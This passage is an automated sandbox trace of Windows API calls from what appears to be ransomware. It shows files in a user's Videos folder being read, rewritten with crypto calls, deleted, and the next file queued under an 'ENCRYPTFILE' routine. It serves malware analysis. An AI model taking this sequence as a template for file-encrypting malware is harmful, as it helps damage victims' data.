[0106.773] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0106.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0106.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.773] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xd1a0, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144e834*=0xd1a0, lpOverlapped=0x0) returned 1 [0106.775] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cacb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0106.776] CryptDestroyKey (hKey=0x41ac140) returned 1 [0106.776] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.776] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0106.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0106.776] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0106.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.776] FreeLibrary (hLibModule=0x756e0000) returned 1 [0106.776] CloseHandle (hObject=0x258) returned 1 [0106.777] CloseHandle (hObject=0x298) returned 1 [0106.779] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf", lpFilePart=0x0) returned 0x5f [0106.779] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\u5ysbeddagyji-.swf")) returned 0x20 [0106.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0106.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0106.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0106.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8430 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8388 | out: hHeap=0x1780000) returned 1 [0106.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0106.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0106.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0106.781] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe830870, ftCreationTime.dwHighDateTime=0x1d5e515, ftLastAccessTime.dwLowDateTime=0xd21e2dd0, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0xd21e2dd0, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xd19f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="u5YsBEddaGYJI-.swf", cAlternateFileName="U5YSBE~1.SWF")) returned 0x41ac700 [0106.781] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\u5ysbeddagyji-.swf")) returned 1 [0107.529] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe830870, ftCreationTime.dwHighDateTime=0x1d5e515, ftLastAccessTime.dwLowDateTime=0xd21e2dd0, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0xd21e2dd0, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xd19f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="u5YsBEddaGYJI-.swf", cAlternateFileName="U5YSBE~1.SWF")) returned 0 [0107.529] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8430 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0107.530] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 1 [0107.530] TranslateMessage (lpMsg=0x144ebd4) returned 0 [0107.530] DispatchMessageW (lpMsg=0x144ebd4) returned 0x0 [0107.530] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0107.530] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0107.530] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0107.531] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0107.531] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0107.531] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0107.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0107.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0107.531] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0107.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0107.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7b00 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x170) returned 0x43e8260 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7b00 | out: hHeap=0x1780000) returned 1 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0107.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0107.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0107.533] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0107.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0107.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0107.533] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0107.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0107.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.533] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad61f30, ftCreationTime.dwHighDateTime=0x1d5eb2c, ftLastAccessTime.dwLowDateTime=0xc34a6b00, ftLastAccessTime.dwHighDateTime=0x1d5ea38, ftLastWriteTime.dwLowDateTime=0xc34a6b00, ftLastWriteTime.dwHighDateTime=0x1d5ea38, nFileSizeHigh=0x0, nFileSizeLow=0xbdbc, dwReserved0=0x0, dwReserved1=0x8, cFileName="vBQeWbI.swf", cAlternateFileName="")) returned 0x41ac700 [0107.534] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0107.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0107.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0107.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0107.534] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0107.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0107.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0107.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0107.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0107.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0107.535] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0107.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0107.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0107.535] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0107.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0107.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0107.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0107.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0107.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0107.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0107.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, 